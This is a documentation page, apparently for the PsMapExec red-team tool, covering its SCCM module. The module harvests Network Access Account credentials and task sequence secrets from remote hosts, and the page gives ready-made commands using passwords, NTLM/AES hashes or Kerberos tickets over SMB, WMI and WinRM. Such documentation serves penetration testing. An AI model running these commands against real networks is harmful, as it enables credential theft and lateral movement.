Dumps local SCCM secrets for Network Access Account credentials and Task sequence data. Collected information is automatically parsed and organized where it will be stored in $PWD\PME\SCCM\.
Uses a stripped down and revised version of SharpSCCM for execution.
- SMB
- SessionHunter (WMI)
- WMI
- WinRM
| Parameter | Value | Description |
|---|---|---|
| -NoParse | N/A | Will ommit parsing output from each system. |
| -ShowOutput | N/A | Displays each targets output to the console |
| -SuccessOnly | N/A | Display only successful results |
{% code overflow="wrap" %}
# SMB execution with password authentication, targeting workstations
PsMapExec -Targets "Workstations" Method "SMB" -Username [User] -Password [Pass] -Module SCCM
# WinRM execution with hash authentication, targeting servers
PsMapExec -Targets "Servers" -Username [User] -Hash [RC4/AES256/NTLM] -Module SCCM -Method "WinRM"
# WMI execution with Kerberos ticket authentication (Username not required)
PsMapExec -Targets "All" -Method "WMI" -Ticket [doI..] -Module SCCM{% endcode %}
 (1) (1) (1).png)